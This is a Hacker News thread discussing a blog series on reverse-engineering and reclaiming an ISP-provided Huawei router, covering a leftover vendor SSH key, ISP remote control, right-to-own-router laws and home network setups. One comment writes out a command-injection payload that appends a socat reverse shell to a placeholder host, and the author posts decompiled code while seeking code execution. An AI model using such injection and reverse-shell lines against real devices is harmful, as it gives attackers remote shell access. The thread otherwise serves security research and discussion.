[HN Gopher] A detailed look at the router provided by my ISP ___________________________________________________________________ A detailed look at the router provided by my ISP Author : paddlesteamer Score : 487 points Date : 2020-03-25 10:55 UTC (1 days ago) (HTM) web link (0x90.psaux.io) (TXT) w3m dump (0x90.psaux.io) | wyclif wrote: | I'm overseas now, and using one of these crappy ISP-provided | routers. I miss my nice Linksys router back home with high- | density mesh, tri-band WiFi, and four gigabit ethernet ports. | 1_player wrote: | Very interesting article. | | What about that precompiled .ssh/authorized_keys with user | z00163152@HUAWEI-627FB9A3 mentioned in Part 3? | | Any reason why a router firmware would permit root access to | anyone at all? Definitely sounds like a backdoor to me. | skoskie wrote: | That was the worst part. I would have that bombshell as the | lede. And then delete it if possible. | tibbydudeza wrote: | Wow some good detective skills at work here , got a similar | Huawei HG635 from my provider ... kept it because it supports LTE | cutover. | | Fortunately some kind person leaked the admin password so that I | could configure it to my liking. | j_h wrote: | EU net neutrality regulation grants end users right to use their | own equipment. | | https://fsfe.org/activities/routers/ | Someone1234 wrote: | Turkey isn't in the EU. | anticensor wrote: | IANAL, but Turkcell would lose the case in Turkey too. This | is not due to net neutrality regulations (Turkey deliberately | lacks it), but due to case law arisen from competition and | customer rights regulations. However, telcos work around that | too, by "leasing" modems, like telephone divisions did in the | past. Does the trick of "leasing" work in the EU too? | mercora wrote: | in marketing they try hard to make it sound like what you | are going to get by renting their device is WiFi not just | the ability to turn on WiFi functionality of the CPE. of | course everybody wants that but most people don't get | that's not something that has to be provided by the ISP. I | am not sure if its required, but i have seen often a lower | end device (without WiFi accessible) is given for the | lifetime of the contract free of charge. | | in Germany you have the right to use a compatible device | you own yourself. However my ISP Vodafone does not accept | lots of modems as compatible and when this regulation | started there were basically none you could actually buy. | Its not much better now i guess but i distress. | | EDIT: reading your comment again the trick you mentioned | probably works because its "yours" when you lease it | instead of renting it? | anticensor wrote: | Not instead of renting, but of selling. | mercora wrote: | note there is only Germany, Italy and the Netherlands with this | regulation enforced. they even link to a [0]page with progress | of that campaign. | | [0] | https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F... | non-entity wrote: | A while back, I was playing around with the cable modem / router | the ISP gave me because I was curious and an idiot. After | screwing around a bit, I managed to find a vulnerability that | exposed technician credentials plaintext and they actually | worked. Had no idea where to report it though, because the | manufacturers contact page could be summed up as _fuck you we don | 't talk directly to consumers_. I dont think the vulnerability | was that bad, as you had to be logged in to the web interface | already with another account, but still. | | I don't really trust ISP provided hardware / software now though. | Bartweiss wrote: | > _you had to be logged in to the web interface already with | another account_ | | Obviously I don't know specifics, but if this applies to any | router which has multiple tiers of login then it could be a | pretty serious problem. I suspect that might be true for | routers designed specifically broadcast multiple networks (e.g. | school or shared apartment-building routers)? | praptak wrote: | The right thing to do in such circumstances is to publish the | vulnerability. | ProZsolt wrote: | But how do you publish it without the liability of getting | sued? A person like me who don't work in security still | occasionally find some vulnerability. Sometimes you get angry | emails from the company even if you just try to warn them. | jeroenhd wrote: | If you think they'd sue, you can always send the details to | a tech journalist specialized in such matters (someone with | a proven track record of protecting their sources). Use an | anonymous email service to be sure. | | If something goes wrong, they'll take the thread of legal | action and probably win. Companies know that suing | journalists often leads to more bad press than cooperating. | They can even try to contact the company in question for | you if the vulnerability is bad enough. | | If the company doesn't respond or get their shit together, | journalists will get a scoop and the company is forced to | fix their shit. If the company does fix their shit, the | journalist will still get a story out of it and you can | rest easy that you've helped make the internet just a | little bit safer for everyone. | saagarjha wrote: | Publish the angry emails too. | praptak wrote: | Getting sued for what? Also, you can publish anonymously. | | Sitting on exploits forever only helps attackers and gives | false sense of security to dumb companies. | steerablesafe wrote: | You never know. The same technician credentials could | potentially work on many routers from the same ISP, maybe even | through WAN. | mercora wrote: | it looks like this CLI has some hardcoded shell commands with | variable substitutions that look possibly unprotected against | command injection. | | For example iptables %s > %s 2>&1 | | could probably be executed as iptables -L; socat | tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane > | /var/IptablesInfo 2>&1 | | by issuing iptables -L; socat tcp- | connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane | | and therefore it might be possible to get real shell access too. | paddlesteamer wrote: | Hello, OP here, I've actually spent considerable amount time to | find a code execution. I know you'll want to learn details of | FUN_004122c0 but here is the decompiled version of iptables | part from ghidra: | | undefined4 FUN_004045a0(int param_1,int _param_2) | | { int iVar1; int iVar2; char _pcVar3; char cVar4; code _pcVar5; | undefined auStack544 [256]; undefined auStack288 [260]; | FUN_00412530(auStack544,0,0x100); | FUN_00412530(auStack288,0,0x100); if (param_1 == 0) { | FUN_004122c0(auStack288,0x100,"iptables > %s | 2>&1","/var/IptablesInfo"); } else { iVar1 | = FUN_00412210(0x100); if (iVar1 == 0) { | return 0x40010009; } cVar4 = '\0'; | while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) { | if (cVar4 == '\0') { | FUN_004122c0(iVar1,0x100,0x412c84,iVar2); } | else { FUN_004122c0(iVar1,0x100,"%s | %s",iVar1,iVar2); } cVar4 = cVar4 + '\x01'; | param_2 = param_2 + 1; } | FUN_004122c0(auStack288,0x100,"iptables %s > %s | 2>&1",iVar1,"/var/IptablesInfo"); FUN_00412660(iVar1); | } FUN_00412330(auStack288); iVar1 = | FUN_004123c0("/var/IptablesInfo",0x414f68); if (iVar1 == | 0) { pcVar5 = FUN_004126e0; pcVar3 = "Fail\r"; | } else { while (iVar2 = | FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) { | FUN_004126b0(0x412c84,auStack544); FUN_004121a0(0xd); | } FUN_00412520(DAT_0042b010); | FUN_004123a0(iVar1); pcVar5 = FUN_00412500; | pcVar3 = "/var/IptablesInfo"; } (*pcVar5)(pcVar3); | return 0; | | } | | Any ideas? | mercora wrote: | i guess you already tried issuing commands like i mentioned?! | | i am still confused by this code but to me it looks like this | has been originally written in another language but maybe | this is just what it looks like after de-compiling. | FUN_004122c0(auStack288,0x100,"iptables %s > %s | 2>&1",iVar1,"/var/IptablesInfo"); | | for me it looks like FUN_004122c0 is a function of some | object in auStack288 (maybe at offset 0x100?) probably | passing the remaining arguments to a sprintf like function | before executing it... or maybe it is a function to call | instance methods in general and this happens to be the | 0x100th function or something... | | not sure i am getting this right ive never tried this before | ^^ seeing this function would likely be more interesting | Faaak wrote: | Depends if they `execve` or run the command inside a shell. | | I'd bet for (1), but who knows. | Hello71 wrote: | redirections aren't parsed by exec.... | Faaak wrote: | Indeed, I read the command's template too fast. Well, in | this case it's worrysome | Aachen wrote: | Controlling arguments without shell often still leads to | RCE though, because a lot of software has some flag that | runs some command | | https://0x90909090.blogspot.com/2015/07/no-one-expect- | comman... | blakesterz wrote: | Interesting read! There's actually 3 parts to this: | | Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is- | Already... | | And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is- | Already... | | Summary from the end of Part 3: | | "So we managed to change passwords for both ssh and telnet, gain | access to Root user for the web interface, changed that password | too. We changed ACS URL to ours and remove the IP restrictions. | To put it simply, we cleaned up our router from our ISP. Good for | our privacy." | sheep-a wrote: | You forgot this bit of the summary, which I think is more | interesting! | | "Still there is an authorized ssh key left in the firmware but | for now it's enough that we're keeping the ISP out. Maybe in | the future, we can repack the firmware with our configuration | and keys and install it on the router. For now, take care!" | Craighead wrote: | Huawei implies Chinese intelligence services left that there | stevespang wrote: | If you are in Turkey, Egodan's boys are spying on | EVERYONE,especially after the attempted coup. Huawei is happy to | provide spying through the router to Ergodan's Boogiemen - - in | fact, several of them are probably next room over from you | watching your screen now . . . | fulafel wrote: | Trivia: Strictly speaking a box that does NAT is not a router in | the IP protocol sense, it's a kind of proxy. The router | requirements RFC explicitly forbids altering most fields (incl | the address field) in the IP header. | icedchai wrote: | ...an RFC that was written in 1995, before NAT was really | necessary. | | My view: If it forwards IP between different networks, it's a | router. | fulafel wrote: | Nat existed in somewhat wide use in 95, PIX had come out | recently. It's not necessary today either. | icedchai wrote: | It existed, but was definitely not in wide use. I worked | for several early internet providers during that period | (mid to late 90's.) Most folks had public addresses on | their desktops. No customer we ever set up wanted NAT. Most | didn't even have firewalls, sadly! Some of these were small | companies, some of these were large corporations or | universities. | | And I'd argue NAT actually _is_ necessary if you want IPv4 | for home use. We 'd be out of addresses otherwise. | fulafel wrote: | ISPs didn't use it in the early days, but it was used in | corporate/organizational networks. The PIX was apparently | marketed as a security appliance (heh) so that defined | the user base to a large extent. | | You can access the web over v4 with other kind of proxies | besides NAT, for example application level HTTP proxies. | If you want working v4 for all the protocols, NAT is out | by definition anyways. | icedchai wrote: | Yes, I remember the PIX! Probably late 97 or 98, I set | one up for a large corp. They were not using NAT | previously, but HTTP and socks proxies. | packet_nerd wrote: | The box in people's home's colloquially known as a router | actually commonly combines a lot of functions into one: | | * router | | * firewall | | * NAT device | | * modem | | * switch | | * access point | | * DNS resolver | | * DHCP server | | And probably others I'm not thinking of :-) | fulafel wrote: | Adding more functions to a router doesn't make it a non- | router. But if it's doing NAT and not routing, then it's a | different distinction. But yep it depends on the | configuration. | qubex wrote: | I call them "terminal adapters", because I'm still stuck in | the ISDN age. | sandov wrote: | ONT in the case of fiber. Don't know if it technically counts | as a modem. | bobbob1921 wrote: | Media converter maybe? (Like those $100 or so fiber to | ethernet converters, I say this as it's usually a | modem/router plugged into the ONT's ethernet port that does | isp to cpe authentication, tunneling, etc. so the ONT is | just converting fiber (from isps OLT) to ethernet for | something more common to plug into) | iso1631 wrote: | I have a box that runs various routing protocols including OSPF | and BGP, but also does nat where it needs to. It's known as a | "router" | c0nsumer wrote: | Very true. Yet at the same time, it does route traffic to the | appropriate boxes. And the name 'router', when referring to | something someone has at their house, has entered the | vernacular to mean "the box at home which lets me share the | internet connection across all my computers". | | Most folks have no idea how it works behind the scenes, which | typically is a combination of NAT (IPv4), routing (IPv6), DHCP, | DNS, UPnP, and more. So, it's just "the router". | zamadatix wrote: | The NAT RFCs came after the routing RFC and refer to NAT as a | router function not as an orthogonal function, boxes that do | NAT are referred to as routers in the RFC. This is reflected in | the real world where NAT is implemented as part of the routing | chain not as a separate module. Remember NAT isn't a box | creating 2 sockets and ferrying data between them it is just | the translation of fields on top of normal routing | functionality. | the8472 wrote: | > boxes that do NAT are referred to as routers in the RFC. | | Newer RFCs use different terms such as CPE (customer premises | equipment) and AFTR (address family transition router) | gerdesj wrote: | RFC 1918 does allow that the internet was changing rather fast | back in 1995 and accepts it probably wont be the final word: | https://tools.ietf.org/html/rfc1812#section-1.3.1 | tssva wrote: | Trivia: Strictly speaking a box that does NAT is not a kind of | proxy. Proxies act as the destination end point of one | connection, establish a separate connection to another endpoint | and forward data between the two separate connections. A NAT | device changes IP header information such as the address field | and if also doing PAT the port field but doesn't act as the | source or destination for connections. | mafuy wrote: | Many people here pointed out a problem: Removing access for the | ISP and/or device manufacturer means they cannot fix bugs | remotely and automatically. This is bad in situations like when | the Mirai malware hit. | | How about this?: "You can use your own device and we provide all | required information, but there will be no advanced support and | you have to check for bugfixes yourself monthly." | | ... now that I wrote it, I see the answer: There is no way to | enforce this, especially not reliably. | marcosdumay wrote: | Ok, from the Wikipedia: | | > Mirai then identifies vulnerable IoT devices using a table of | more than 60 common factory default usernames and passwords | | Taking control of the device is exactly the kind of thing that | stops that attack. | davedx wrote: | Fantastic write up from a hacking point of view. I did wonder | about this statement though: | | "This is very invasive and unacceptable. It may seem necessary to | apply security patches published by your ISP but the user should | be able to disable it whenever she wants." | | Legally, at least in countries where I've lived, the ISP still | owns the router. This surprised me a bit when I first found out, | but then I got used to the idea, but you should treat any ISP or | telecom gear in your house as something that's "rented but still | owned and controlled by someone else". | yjftsjthsd-h wrote: | And that is why I have my own router plugged into the ISP | router:) | blacksmith_tb wrote: | True, but I think it's worth comparing it to other utilities in | your home - what if your electric company could make all your | lightbulbs 20% dimmer without notice? Or if your water heater | was remotely administered? ISPs, like mobile telcos, like to | claim they must have control over your hardware "for security" | but I think the most charitable interpretation is that it's to | make their customer service dept. sweat less (more nefarious | possibilities exist, of course). | CJefferson wrote: | The difference is that non-updated routers can cause global | problems. At the very least as an ISP I'd want to say you can | look after updates yourself, but we will disable your access | to the internet (other than to get the update from us) | whenever we try to push an update to you and you reject it. | ProZsolt wrote: | This is why I like separate modems, so there is a clear | border between you and the ISP. Sadly currently most of the | providers only give you AIOs. | Thaxll wrote: | You're lucky to have an SSH server active, on mine I had to open | the router and dump the firmware manually :/ | lxe wrote: | > After looking into folders, I found some interesting files. I | won't go through them here but I want to mention just one of | them: [$ cat etc/ssh/authorized_keys]. Maybe an engineer from | Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific | DSS key, can connect all HG253s routers without needing a | password, who knows? | | Who knows indeed?! | AdmiralAsshat wrote: | I never thought to nmap my own router until reading this. | PORT STATE SERVICE 53/tcp open domain 80/tcp | open http 631/tcp open ipp 5000/tcp open upnp | 7777/tcp open cbt 20005/tcp open btx | | Now begins the three-hours-and-counting rabbit hole of trying to | figure out what the hell is running on ports 7777 and 20005. Or | why UPNP is apparently running, despite UPNP being explicitly | disabled on the Netgear router's admin page. | manifoldgeo wrote: | Maybe it's a remote administration port for your ISP. I have a | router provided by Froniter, formerly Verizon FiOS, where port | 4567 is always open and cannot be closed with a firewall rule | from the router's web UI (grayed out). After some googling I | found out that it's their maintenance port: | https://www.speedguide.net/port.php?port=4567 | | For a while I had my own OpenWRT router in place of the ISP | one, but I think they got wise to it and blocked the MAC. I | changed it to match the ISP router's MAC address, but it only | worked for about 3 minutes before being blocked again. | AdmiralAsshat wrote: | I bought both my modem and my router, so I'd be a little | incredulous if my ISP had somehow forced a port open on it. | | The 20005 one _may_ be some port that NetGear uses for its | USB Printing, I 've found some articles that mention it. | | It also struck me that I hit it with nmap using the LAN IP, | so perhaps these are only open _within_ the network. I | probably need to hit the external IP of the router to see | what is externally open. ShieldsUP! didn 't show anything | unusual.[1] | | EDIT: Disclosure of a vulnerability regarding port 20005[2], | and Netgear confirming that it does affect my router[3], but | should have been fixed. I assume the "fix" was fixing the | buffer overflow vulnerability, rather than closing the port | altogether. | | [1] https://www.grc.com/x/ne.dll?bh0bkyd2 | | [2] https://www.kb.cert.org/vuls/id/177092/ | | [3] https://kb.netgear.com/28393/NETGEAR-Product- | Vulnerability-A... | jason0597 wrote: | It's funny to think that if you were to report all of your | findings to your local newspaper (Turkish newspaper in this | case), as to how Turkish ISPs have complete access to your router | or how Huawei (China) has an SSH key for your router, people | would go absolutely ballistic. But for us it's just another day | of expected craziness and we're tired of talking about it | kuesji wrote: | i don't think too many people care about this. ( yes, i live in | turkey ) | Someone1234 wrote: | > how Turkish ISPs have complete access to your router | | You think it is going to blow people's socks off that a router | provided and controlled by an ISP is accessible by that same | ISP? Huh? | | The Huawei SSH key is a little strange, but depressingly common | for network equipment, even big names like Cisco[0]. | | [0] | https://tools.cisco.com/security/center/content/CiscoSecurit... | Eremotherium wrote: | >even big names like Cisco | | Even? By now Cisco having hardcoded credentials and glaring | security fuckups is a meme. | gumby wrote: | > The Huawei SSH key is a little strange, but depressingly | common for network equipment, even big names like Cisco... | | There's an understandable reason for this: the isp's staff | aren't necessarily any more competent than the isp's | customers (some are, but there are so many ISPs that I | suspect they are now a small minority). So just at the isp | wants to be able to reset your interface devices remotely, so | will Huawei and Cisco support for the ISPs themselves. | | I am not implying that "understandable" means "justified" | p1esk wrote: | Yeah, no one cares outside of hackernews. | blaser-waffle wrote: | Hell, I'd imagine my grandmother or other non-tech family | would be glad the telephone company can pop in and fix it | Thaxll wrote: | If that stuff listen to the interface of your public IP which | is most likely not the case, but yes it's still scary. | closeparen wrote: | CPE is just part of the ISP's infrastructure that happens to be | in your house. There is no need to trust it. Just put your own | router in front of it. | hazeii wrote: | Indeed, I've had a linux box between the router and the local | network since the days of dial-up (originally it _was_ the | dial-up box, which made and shared the 'net connection). The | only reason I've ever had to upgrade the hardware has been | because the original setup only had 10MBps NICs. | TheSpiceIsLife wrote: | > if you were to report all of your findings to your local | newspaper ... people would go absolutely ballistic. | | You reckon? I don't think they'd even be interested in hearing | about it. | | Where do you live and who is your local paper that leads you to | believe they'd bother writing, let alone publishing, such a | story? | kspacewalk2 wrote: | Turkish newspapers are almost universally subservient to the | autocratic government. Any free press that's still somehow | around has way more consequential dictatorial abuses of power | to report on, if they dare. | 0xff00ffee wrote: | I'm pretty sure my new CenturyLInk fiber router is similar. I | tried to create a PPoE connection from my WRT1900 direclty to | century link using the same credentials and I couldn't connect | to my internet. However, now I am motivated to create a bridge | and find out why. | | For CenturyLink fiber I have two boxes: | | Box A: the exterior fiber enters this box, the tech said it was | a "translator"; and the port 4 ethernet on it goes to ... | | Box B: the centurylink wireless router, which performs the PPoE | with my credentials which were somehow hardwired because no one | ever told me my username/password. I'm guesing TR-069? Then | port 4 on this goes to ... | | Box C: MY WRT1900AC, which then goes to other subnets for my | cameras, lab, and office. | | I figured Box B was redundant, but trying to remove it has been | problematic. | tenebrisalietum wrote: | B probably exists so they can split fiber between multiple | end users or support things like phone service over the same | link. Did you use the same VPI and VCI? PPPoE also sends an | identifier (the "Host-Uniq" tag if I'm understanding it | right) that probably has to match what your ISP is expecting | or has assigned. | Tourus wrote: | > PPoE with my credentials which were somehow hardwired | because no one ever told me my username/password | | They make it very hard to use your own "Box B", but I've set | this up twice now (most recently last week). Get the username | and password from CenturyLink (the tech that installs the | service has this, or call them). Then, google search "century | link vlan 201 wan tag". The trick is you need a router that | has this functionality, most basic consumer ones don't. | | Unfortunately, even if you follow all directions and it still | doesn't work troubleshooting is a nightmare, very little or | no help from their customer support. | 0xff00ffee wrote: | Ah I see. My WRT1900AC doesn't have that option. I was | running OpenWRT but ran into some issues and panicked back | to the default firmware. Now that I have another wireless | router I might dare it again. | JackRabbitSlim wrote: | I had CL fiber. VLAN tagging; The vlan tagging value was so | high, OpenWRT didn't support it so I was left with the | useless middle box. Your mileage may very. | 0xff00ffee wrote: | I was just about to re-install OpenWRT, but I guess I won't | now. | 0xff00ffee wrote: | Why did port 8015 show up on the remote system after resetting | firmware? Shouldn't nmap have reported that? | usmannk wrote: | It was a "fast nmap", so only the top 100 most common ports | were checked. | 0xff00ffee wrote: | Ah, thanks. If nmap was run exhaustively on all 64k ports, | would that both (a) take forever, and (b) raise alarm bells | on the target? Why isn't a full scan the norm? | zeroflow wrote: | ...and that's why my ISPs router is running in modem mode with a | non-ISP-controlled router from Ubiquiti behind it - which I may | replace with a pfSense box in the future. | | I'm pretty happy that my cable ISP is allowing this mode so I | don't have to double-NAT in my setup. | matheusmoreira wrote: | You're lucky your ISP's router offers you that option. My ISP's | VDSL2 router would require "unlocking" in order to get bridge | mode and it can't be easily replaced. | pwg wrote: | This is why, in my case, the ISP's router (that awful box | Verizon provides with FIOS) is sitting, beside the DMARC, | unplugged and powered off. | | My DMARC has a hot ethernet jack, and _my_ firewall (PC running | Linux) that I control is connected to that ethernet jack. No | ISP shenanigans (other than what they can remotely do to | configure the FIOS DMARC itself). | awelkie wrote: | If your ISP didn't have that feature, could you just replace | the cable modem too? My ISP's router is running EuroDOCSIS 3.0 | and I'm wondering if I could replace the router with a modem + | router of my own. | zeroflow wrote: | Sadly I could not, since the ISP is defining the router as | the endpoint of it's network so there is no freedom to choose | different models. | em-bee wrote: | practically though what is the difference between having | the endpoint in a shaft by the elevator or in your | apartment or even down the street? in all scenarios i'd put | my own router behind the ISP equipment and run my local | network however i want. | | the only issue is with getting a public ip address for | inbound connections. | | here we are not getting public ip addresses anyways, so the | point is moot for me. but if you do get one, then all they | need to do is configure their router to forward the public | ip to yours. | | in my case the ISP even installed two routers. one was | theirs that i had no access to and one was "ours" that i | was able to configure as i liked or replace with my own. | both routers had their own wifi, but i don't use the one | from the ISP endpoint router | mercora wrote: | if you happened to live in Germany there is a law in place | that force ISPs to allow that. But if you would live in | Germany you would probably know about this. That said there | is no technical reason making it impossible. If you connect | an unknown device here, you get access to the customer web | panel only and can register your device using it. Afterwards | it gets provisioned as usual (with caveats [no PacketCable | for example]) | pmlnr wrote: | Yes, you could, but the new router+modem needs to be | "accepted" by the DOCSIS provisioning. Talk to the support | about it. | skoskie wrote: | I have been so disappointed with my ubiquiti hardware. That UI | is gorgeous, but lacks some real functionality that I need. I | can't block BitTorrent (see forums). And I can't see a detailed | traffic log; only the categories. Plus, those pretty graphs | that tell you how much data you've used doesn't give a time | frame. I have no idea if it's a week or a month. | | I think pfSense will be my next too. | bonestamp2 wrote: | I recently upgraded my internet speed and my pfSense box was | limiting my top download speed. So, I just went from pfSense to | a Ubiquiti Secure Gateway. There are pros and cons of each, but | I couldn't find any trustworthy pfSense hardware with the | performance of a USG for anywhere near the same price. I do | miss the configurability of pfSense though so I might switch | back some day. That said, the ubiquiti interface and | provisioning model is really slick. | chrisweekly wrote: | I'd be grateful for guidance eg a link to a writeup of | recommended hardware and config for a reasonably technical | audience, eg "Given a Verizon FIOS G1100, put it in bridge mode | and connect hw that supports software X"... | mercora wrote: | most of the time you only require PPPoE or DHCP as you | practically speaking get a ethernet tunnel to your ISP using | that bridge. Some ISPs additionally segment this network by | VLANs so your list of required features is probably already | complete here. | hestefisk wrote: | My ISP (Internode) provide a 'modem' for my NBN hybrid coax / | fibre connection. I just put my OPNSense router in front of it | and it's all secure. They provided me with all the config | settings, which are a bit more obscure than usual (PPPoE but on a | specific vlan tag). Works like a charm and I don't have to worry | about weird government wiretapping or backdoors. My ISP provide | an IPv6 range too, which is pretty cool. | miki123211 wrote: | Apparently a polish carrier called Multimedia has recently | introduced a new, revolutionary service for some customers. It's | called "set up a custom wi-fi configuration", and it's just 5 pln | (a little over $1)! It lets you think up of a ssid and password, | and configure your router to use those! That's an amazing | invention, isn't it? /s | | Some customers apparently have absolutely no access to their | routers, not even to the web interface, and they can't use their | own either. All reconfiguration must be done through the customer | service portal or by phone. That means the carrier can change for | every little thing, including changing the Wi-Fi config! I'm not | sure if you can even bridge, but I guess not. Note that this does | not affect all customers of that carrier, just a minority. | gbrown wrote: | Couldn't you just daisy chain a second router via Ethernet and | use it? Bonus points for VPN-ing all of your traffic. | the8472 wrote: | Daisy-chaining routers is can severely degrade some services | (gaming, p2p) due to NAT. Assuming the ISP-provided one | supports PCP or UPnP-IGD you need a client on your own router | that relays port forwarding configuration to the upstream | router. This is possible but may need non-trival setup. | pathseeker wrote: | PCP that allows ingress connections without an established | egress connection is rarely enabled. The same applies to | UPnP because of the baddies. | | https://en.wikipedia.org/wiki/Port_Control_Protocol#Securit | y | ege_erdogan wrote: | I am using the exact same router from the same ISP. I was | wondering what the problem was when I wasn't able to forward port | 22 to my computer for an SSH connection. | | I had thought it had something to with the ISP allocating the | same static IP to multiple clients and blocking some common ports | to prevent collisions (ended up using port 109.. something for | SSH). Turns out it was more interesting! | gumby wrote: | I clicked through to the two follow ups -- this is both excellent | sleuthery and a wonderful write up. | sloshnmosh wrote: | I very much enjoyed this! I bookmarked your site and hope to read | more of your posts in the future. | jscholes wrote: | Enjoyed this write-up, but most of the exploration seemed to be | facilitated by someone having already leaked the CLI root | password online. Anyone have suggestions on how you might | otherwise obtain that information? | paddlesteamer wrote: | Hi, OP here, actually it's not true. Think the scenario as | this: you don't have the CLI root password, you just do a MitM | attack and learn about root password when your ISP attempts to | change it. This applies my situation, also I could learn about | the default password just by looking into the firmware. | LeonM wrote: | In the Netherlands we now have a law where ISPs must allow your | own choice of network equipment. This means they must give you | the required information on how to connect your own device with | their network. | | I have a fiber connection, which I connected directly to a | Ubiquity router through a suitable SFP module. My ISP supplied | the information on the fiber type and which VLAN ID's to setup | for internet, TV and telephony. | | This way I have my own equipment, that I control myself. The | 'modem' [0] which my ISP supplied is still in its original, | unopened box. | lima wrote: | Same in Germany! ISPs hate it because it it makes their lives a | lot harder - in cable networks, they now have to deal with a | zoo of endpoints on a shared medium vs. a small set of | standardized devices. | | As a customer, I like it. | metters wrote: | They also hate it, because they cannot charge rent, like for | the ISP owned router. | pas wrote: | Can't they still just provide you with a "modem" and give you | full IP access through that? What difference does it make if | they put the modem inside our outside your premises? (Eg they | put a switch/DSLAM/modem into a box on the street and then | they give you a cable?) | pdonis wrote: | _> ISPs hate it because it it makes their lives a lot harder | - in cable networks, they now have to deal with a zoo of | endpoints on a shared medium vs. a small set of standardized | devices._ | | In other words, ISPs hate it because it forces them to | actually do their jobs and be ISPs. The Internet itself is "a | zoo of endpoints on a shared medium", and ISP stands for | _Internet_ Service Provider. | josephmosby wrote: | It's not the provision of Internet that's the problem, it's | the customer service requests. | | e.g., AT&T could provide perfect service to the home | endpoint, but the customer bought some aftermarket router | from their cousin, who had configured it for Verizon. | Customer calls AT&T to holler. Tier 1 support doesn't know | what that particular router config GUI even looks like, so | it gets bumped to T2 or T3. Ultimately to find out that the | customer's cousin had hardcoded DNS to some internal | Verizon system that's not visible to AT&T. | | Repeat x100K. ISPs job isn't just "provide the Internet," | it's also "provide all the troubleshooting for every non- | technical customer who just wants to watch Netflix but | doesn't even know what a router is" | ClumsyPilot wrote: | Well, my understanding is that once you have your own | router, it's up to you to ensure its configured | correctly. | pdonis wrote: | Exactly. I have my own router (and cable modem, for that | matter), and I don't call Comcast when one of them | breaks; I fix it myself, since I own them. | kitteh wrote: | Problem is you'll eventually reach a point where the | problem is deep and requires them to escalate, and if you | aren't checking the box of tested customer cpe they'll | stop. Example of this is when I found a Comcast backbone | link with an incorrect/inconsistent MTU setting. Had to | go back channel in the end to someone on the ibone team, | but I had no chance in hell of getting that fixed | promptly via regular support. | pdonis wrote: | _> you 'll eventually reach a point where the problem is | deep and requires them to escalate, and if you aren't | checking the box of tested customer cpe they'll stop_ | | I've been a Comcast customer for more than 20 years (in | two different states) and have never encountered a | problem like this, so I expect such problems are | extremely rare. Every issue I've had has been of the kind | where Comcast's support person can see right away that | there's a problem on their end because they can't even | see my cable modem's status even though I confirm to them | that it's powered up and the cable is connected (and of | course I have to go through the dance of rebooting it | multiple times before they'll be satisfied). Most of the | time they put me on hold for a while and then come back | and the problem is fixed (I assume because some tech in | the background rebooted or reset something that was | borked). Once they had to send a tech to my house and it | turned out there was a bad connection in the junction box | they had installed outside. | matheusmoreira wrote: | > provide all the troubleshooting for every non-technical | customer who just wants to watch Netflix but doesn't even | know what a router is | | People who don't even know what a router is don't buy | their own equipment. Those who buy better routers don't | require support for them, they call when there's a | problem between the ISP and the router. | pdonis wrote: | _> ISPs job isn 't just "provide the Internet," it's also | "provide all the troubleshooting for every non-technical | customer who just wants to watch Netflix but doesn't even | know what a router is"_ | | No ISP that I'm aware of will provide troubleshooting for | devices they don't own. They just say "sorry, not our | device, not our problem". When I installed my own cable | modem and router, Comcast was quite clear about that. And | I said "fine, no problem". | jmiserez wrote: | My ISP does, but they're the exception to the rule and | cater to techies. Of course support questions for random | devices need to be more specific than just "it doesn't | work". | pdonis wrote: | _> My ISP does_ | | Out of curiosity, which ISP do you have? | jmiserez wrote: | init7.net. They have a bunch of official guides, but also | help with other devices and have debugged issues with new | devices. Basically if your device is capable they want to | make it work. | thallian wrote: | Init7 is great, I only had to tick a checkbox saying | something like "I know what I am doing" and apart from | providing the technical information they left me alone. | Only had one problem with them that they resolved very | quickly (the fiber cable got damaged somewhere in the | basement). | kitteh wrote: | +1 to init7. They've gone above and beyond when I needed | them to change their routing policies to improve end to | end latency to a specific destination. Good luck getting | that from a major us carrier. And I wasn't even a | customer. | iagovar wrote: | The ISP I work for does, and it's a very large one (not | in the US). If a router is not ours, we check for sync or | if PPPoE is up. We tell the customer what's the result of | our tests and offer a technician if they are willing to | pay in case it's not our fault. | | Most people are unwilling to pay, and yell at customer | service. Most of the times, specially when the router has | sync it's customer fault. | the8472 wrote: | > we check for sync or if PPPoE is up. | | The problem with this kind of procedure is that it's only | a reasonable way to locate the problem when there are | problems at that very moment. You're getting stonewalled | when - during the day - you're reporting that it | frequently loses sync during the night. | CameronNemo wrote: | I work at an ISP of sorts. It is a regional research and | education network. We are owned by our members. | Heterogeneity is definitely par for the course, but that | does not stop us from trying to roll out some ubiquity | where we can. Many of our CPE routers are the same make and | model, and that makes maintenance and analysis much less | error prone. I.e. better service for our member | institutions. | | If you want an ISP whose competitive advantage is dealing | with whatever crazy shit the edge throws at it, then that | is your prerogative. But having some ground rules and | baseline behavior makes it so that the ISP can focus on | more rewarding tasks, such as negotiating peerings, | establishing direct tunnels, improving network | observability, and predicting necessary backbone upgrades. | pdonis wrote: | _> having some ground rules and baseline behavior_ | | Doesn't "if you choose to use your own cable | modem/router, it must meet the DOCSIS 3 specification" do | this? That's the rule Comcast made me follow. | saber6 wrote: | To bolster your point: Honestly they don't need to do much | - the infrastructure is already there as a matter of being | able to turn people's service up/down/on/off. | | There is always a provider-managed CPE device that | functions as the service demarcation point. This is the | point where your contracted service speed is enforced | (shape + egress queue and ingress policing). | | You can have literally whatever router (dumb, smart, next- | gen, whatever) spewing bits at X rate. The CPE will | essentially normalize (police) that bit rate to your | contracted speed (upstream scenario). | pathseeker wrote: | >The Internet itself is "a zoo of endpoints on a shared | medium", | | No, the shared medium in this case is referring the last | part of the cable network where everyone in a neighborhood | is transmitting effectively onto the same cable. | | All it takes is a single device with a broken configuration | to spew crap onto the wrong channels, taking down the whole | neighborhood. | https://en.wikipedia.org/wiki/DOCSIS#Physical_layer | | On the Internet it stops being a shared medium the minute | it gets out of the cable network into fiber/ethernet | switched+routed interconnections. | hiram112 wrote: | What's you cost and speed of the fiber? | | Also, if you didn't need so much bandwidth, is it possible to | just order a basic 100Mb/10mb connection for a nominal fee of, | say, 30Euro? | | The speeds in the US aren't actually that bad, but you're | basically forced to pay for everything: paid cable TV, | equipment rental fees, etc, and your $40 plan ends up creeping | towards $100 / month after the fees and taxes, with increases | every year. | ProZsolt wrote: | Don't 